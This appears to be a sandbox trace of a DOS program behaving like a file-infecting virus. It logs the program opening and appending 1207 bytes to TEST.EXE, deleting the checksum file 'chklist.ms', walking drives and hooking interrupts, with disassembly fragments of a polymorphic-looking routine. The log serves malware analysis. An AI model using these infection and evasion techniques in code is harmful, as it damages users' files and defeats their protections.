2018-12-25T12:23:33.054369978Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:33.273262017Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:33.275465352Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:33.277654328Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.279049257Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.280289666Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.281597852Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28265648Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.283592591Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28509532Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.286116335Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.28715445Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.288831024Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.289805082Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.290769104Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.292247765Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.293211384Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.294149929Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.295861368Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.296806931Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.297775618Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:33.299185596Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.30107793Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.302962726Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.305146304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.307010517Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.309007449Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.311725095Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.313541553Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.31582968Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.317671349Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.319502279Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.321630481Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.32377815Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.325736762Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.328326469Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.330374506Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.332314447Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.338405586Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.340676474Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.343142392Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.346596997Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.348877842Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.351116296Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.35372431Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.355922789Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.358467738Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.361317206Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.364241642Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.366421718Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.369029063Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.370895437Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.373189854Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.375643042Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:33.380176329Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":5,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:35.045413018Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:35.047492183Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:35.051025115Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:35.052994011Z 78 PC: 15408 | Find first file
2018-12-25T12:23:35.059228453Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:35.065768926Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:35.08284929Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:35.094470656Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:35.096163625Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:35.103775011Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:35.10534291Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:35.108033723Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:35.110201645Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:35.112380205Z 64 PC: 15550 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:23:35.119913423Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:35.122735946Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:35.131159645Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: lodsb al, byte ptr [si]
0x1557f: add byte ptr [bp + 0x31], dl
0x15582: fnsave dword ptr [bx + di]
2018-12-25T12:23:35.134192841Z 64 PC: 1557b | Write file or device (Write 20 bytes on handle 5)
2018-12-25T12:23:35.137084928Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:35.138398618Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:35.13985561Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:35.142882383Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:35.148367592Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:35.154041189Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:35.156015789Z 62 PC: 155d0 | Close file
2018-12-25T12:23:35.164231753Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:35.174685048Z 79 PC: 1541f | Find next file
2018-12-25T12:23:35.177531044Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:35.181815984Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:35.18360435Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.185017012Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.190103026Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:35.193735808Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:35.199778037Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.200804094Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.209800648Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.215721273Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:35.548980902Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:35.55615668Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:35.558297248Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:35.565441316Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:35.567427183Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:35.570836799Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:35.573791191Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:35.576186716Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:35.583594355Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:35.586279884Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:35.596406007Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:35.599613313Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:35.602790855Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:35.604470603Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:35.606669656Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:35.609423396Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:35.621685756Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:35.629181563Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:35.630564391Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:35.637343752Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:35.646806064Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:35.649873924Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.655753285Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:35.666217149Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:35.673052488Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:35.674747263Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:35.68122882Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:35.683413573Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:35.685715759Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:35.688890122Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:35.691211889Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:35.698149145Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:35.701421554Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:35.708949829Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:35.71161312Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:35.715037418Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:35.716439736Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:35.717700439Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:35.720883742Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:35.726643731Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:35.732480543Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:35.734553945Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.038254269Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.047586009Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.051457177Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.058197042Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.067572996Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.074532599Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.077149927Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.08285473Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.084634762Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.08811909Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.090557509Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.092938715Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.099757749Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.102178765Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.110677938Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.114328106Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.117580502Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.119135772Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.121283072Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.124359297Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.130941581Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.137414678Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.139047527Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.146021797Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.156015563Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.159038932Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.164648908Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.174525892Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.181276634Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.183004822Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.189401102Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.191215809Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.194295493Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.197378382Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.199793703Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.206113557Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.209193802Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.21687376Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.219289219Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.223287446Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.225331693Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.226977229Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.231044004Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.237295406Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.243400557Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.245289326Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.252407316Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.262247497Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.265824463Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.271672113Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.281017495Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.288247933Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.289893665Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.295622667Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.297604095Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.302264717Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.304804064Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.30719674Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.314537229Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.31719452Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.324329957Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.327534346Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.33141024Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.333160991Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.335701258Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.338480375Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.344114901Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.35062132Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.352352961Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.660178557Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.670530474Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:36.671760768Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.675569375Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.679602328Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:36.680785623Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.684276366Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:36.68644076Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:36.690391972Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:36.69250064Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.70248023Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.712995562Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.721984746Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.756609292Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.757617949Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.758580322Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.759966945Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.761041453Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.761957748Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.763575885Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.764518014Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.765418973Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.766759876Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.767855021Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.76881512Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.770391336Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.771348409Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.772258155Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.773806907Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.774844667Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.775810385Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.777068269Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.77802018Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.779099392Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:36.780449271Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:36.781400597Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:36.783408795Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:36.989262803Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:36.991390555Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.99373564Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.995637214Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.99705576Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.999280171Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.001066377Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.0024628Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.00460617Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.006334573Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.007680063Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.009947414Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.011142946Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.012403323Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.014491036Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.015947277Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.017246563Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.019277967Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.020755556Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.022040839Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.024123852Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.03037439Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.032629935Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.035616401Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.038183337Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.040430966Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.044141844Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.046278215Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.048448499Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.051454231Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.053952707Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.056192012Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.059141933Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.061288323Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.063352432Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.066477569Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.068593284Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.070589543Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.078939381Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.08103247Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.082983008Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.085871567Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.087837743Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.090214453Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.09316855Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.095591802Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.097824049Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.100885532Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.10311794Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.105324458Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.107934452Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.110095304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.112170728Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.11666299Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":13,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:35.416150471Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:35.417849071Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:35.420637145Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:35.421543151Z 78 PC: 15408 | Find first file
2018-12-25T12:23:35.428095897Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:35.433502282Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:35.548646845Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:35.560651323Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:35.562256668Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:35.568995584Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:35.571782047Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:35.574284671Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
